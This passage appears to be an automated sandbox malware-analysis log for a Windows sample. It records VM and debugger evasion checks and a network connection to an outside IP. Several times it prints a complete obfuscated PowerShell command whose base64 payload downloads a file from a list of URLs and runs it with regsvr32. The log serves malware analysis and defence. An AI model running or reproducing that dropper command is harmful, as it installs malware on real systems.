                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep count: 3984 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep count: 1628 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 6088Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5452Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3984
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1628
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.1 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                  Source: powershell.exe, 00000002.00000003.314531683.0000000007C68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.314599281.0000000007CA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                  Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                  Source: svchost.exe, 00000013.00000002.506415446.0000025912461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: svchost.exe, 00000016.00000002.436665158.0000019AC5CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                  Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1ized
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                  Source: svchost.exe, 00000007.00000002.503991655.0000013648C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                  Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.504833353.000002590CC29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506373657.0000025912449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436651774.0000019AC5CED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.431270791.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436453296.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505261417.0000021040CC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504593102.0000021040C2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504871113.0000021040C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                  Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.ed
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                  Source: svchost.exe, 00000007.00000002.504260909.0000013648C28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.504324555.000002495A829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65D00215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
